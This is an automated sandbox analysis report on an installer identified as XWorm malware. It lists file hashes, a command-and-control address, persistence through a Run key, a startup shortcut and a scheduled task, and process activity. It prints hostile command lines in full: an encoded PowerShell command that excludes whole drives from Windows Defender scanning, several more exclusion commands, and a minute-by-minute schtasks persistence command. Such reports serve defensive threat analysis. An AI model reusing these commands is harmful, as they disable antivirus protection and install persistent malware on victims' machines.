Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows11-21h2_x64
- resource: win11-20231215-en
- resource tags: arch:x64, arch:x86, image:win11-20231215-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 04-02-2024 00:59
- Static task: static1
- Behavioral task: behavioral1
- Sample: Internal_Installer.exe
- Resource: win11-20231215-en
General
- Target: Internal_Installer.exe
- Size: 140.7MB
- MD5: c2e31745e3839161e7dbd874062f2946
- SHA1: bd9d04177a5f5a906d7b73ecf271011178064708
- SHA256: 30b429740ae782ad1ce0b0d9e569ab42ce1c9a43e358c490c6e539ca7bdbb40d
- SHA512: 8e0909fb6c0cae985e35475c86d0d0209bbfce8e41350e40d305128acd5aef52fb5ab0c756bf5bbf370597dadfcfd8754a7210ec907bfd22cffa8dfe7d1050c9
- SSDEEP: 1572864:V4GRQtQzKNAwsDi3fRusajRHgsP6pVm1Etb5/xISipohDtrbw6koLAYE3SWAPKos:+GaCK2wlZajCSvp0+AioCKs
Malware Config
Extracted
- Family: xworm
- C2: 3.125.102.39:18996
- Install_directory: %AppData%
- install_file: XClient.exe
Signatures

Detect Xworm Payload (3 IoCs)
resource / yara_rule:
- behavioral1/files/0x000900000002a77d-4.dat: family_xworm
- behavioral1/memory/4264-11-0x00000000008D0000-0x00000000008EC000-memory.dmp: family_xworm
- behavioral1/memory/5012-240-0x00000222DA010000-0x00000222DA020000-memory.dmp: family_xworm

Drops startup file (2 IoCs)
description / ioc / Process:
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk (XClient.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk (XClient.exe)

Executes dropped EXE (5 IoCs)
pid / Process:
- 4264 XClient.exe
- 716 InternalWinFormsClean.exe
- 3456 XClient.exe
- 3464 XClient.exe
- 2272 XClient.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description / ioc / Process:
- Set value (str): \REGISTRY\USER\S-1-5-21-1155165157-2721788668-771323609-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" (XClient.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow / ioc:
- 1: discord.com
- 3: discord.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc:
- 1: ip-api.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process:
- 3932 schtasks.exe

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid / Process:
- 4264 XClient.exe

Suspicious behavior: EnumeratesProcesses (11 IoCs)
pid / Process:
- 3120 powershell.exe
- 3120 powershell.exe
- 1988 powershell.exe
- 1988 powershell.exe
- 4664 powershell.exe
- 4664 powershell.exe
- 5012 powershell.exe
- 5012 powershell.exe
- 1116 powershell.exe
- 1116 powershell.exe
- 4264 XClient.exe

Suspicious use of AdjustPrivilegeToken (10 IoCs)
description / pid / Process:
- Token: SeDebugPrivilege, 4264 XClient.exe
- Token: SeDebugPrivilege, 3120 powershell.exe
- Token: SeDebugPrivilege, 1988 powershell.exe
- Token: SeDebugPrivilege, 4664 powershell.exe
- Token: SeDebugPrivilege, 5012 powershell.exe
- Token: SeDebugPrivilege, 1116 powershell.exe
- Token: SeDebugPrivilege, 4264 XClient.exe
- Token: SeDebugPrivilege, 3456 XClient.exe
- Token: SeDebugPrivilege, 3464 XClient.exe
- Token: SeDebugPrivilege, 2272 XClient.exe

Suspicious use of SetWindowsHookEx (1 IoC)
pid / Process:
- 4264 XClient.exe

Suspicious use of WriteProcessMemory (17 IoCs)
description / pid / Process / procid_target:
- PID 832 wrote to memory of 3120; 832 Internal_Installer.exe; 77
- PID 832 wrote to memory of 3120; 832 Internal_Installer.exe; 77
- PID 832 wrote to memory of 3120; 832 Internal_Installer.exe; 77
- PID 832 wrote to memory of 4264; 832 Internal_Installer.exe; 79
- PID 832 wrote to memory of 4264; 832 Internal_Installer.exe; 79
- PID 832 wrote to memory of 716; 832 Internal_Installer.exe; 80
- PID 832 wrote to memory of 716; 832 Internal_Installer.exe; 80
- PID 4264 wrote to memory of 1988; 4264 XClient.exe; 83
- PID 4264 wrote to memory of 1988; 4264 XClient.exe; 83
- PID 4264 wrote to memory of 4664; 4264 XClient.exe; 85
- PID 4264 wrote to memory of 4664; 4264 XClient.exe; 85
- PID 4264 wrote to memory of 5012; 4264 XClient.exe; 87
- PID 4264 wrote to memory of 5012; 4264 XClient.exe; 87
- PID 4264 wrote to memory of 1116; 4264 XClient.exe; 89
- PID 4264 wrote to memory of 1116; 4264 XClient.exe; 89
- PID 4264 wrote to memory of 3932; 4264 XClient.exe; 91
- PID 4264 wrote to memory of 3932; 4264 XClient.exe; 91

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

- C:\Users\Admin\AppData\Local\Temp\Internal_Installer.exe (PID 832)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Internal_Installer.exe"
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3120)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAYgBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAbgBnACMAPgA="
    Decoded command (UTF-16LE base64): <#jwp#>Add-MpPreference <#yph#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vbd#> -Force <#jng#>
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Users\Admin\AppData\Local\Temp\XClient.exe (PID 4264)
    Command line: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1988)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4664)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5012)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1116)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\schtasks.exe (PID 3932)
      Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      - Creates scheduled task(s)

  - C:\Users\Admin\AppData\Local\Temp\InternalWinFormsClean.exe (PID 716)
    Command line: "C:\Users\Admin\AppData\Local\Temp\InternalWinFormsClean.exe"
    - Executes dropped EXE

- C:\Users\Admin\AppData\Roaming\XClient.exe (PID 3456)
  Command line: C:\Users\Admin\AppData\Roaming\XClient.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

- C:\Users\Admin\AppData\Roaming\XClient.exe (PID 3464)
  Command line: C:\Users\Admin\AppData\Roaming\XClient.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

- C:\Users\Admin\AppData\Roaming\XClient.exe (PID 2272)
  Command line: C:\Users\Admin\AppData\Roaming\XClient.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads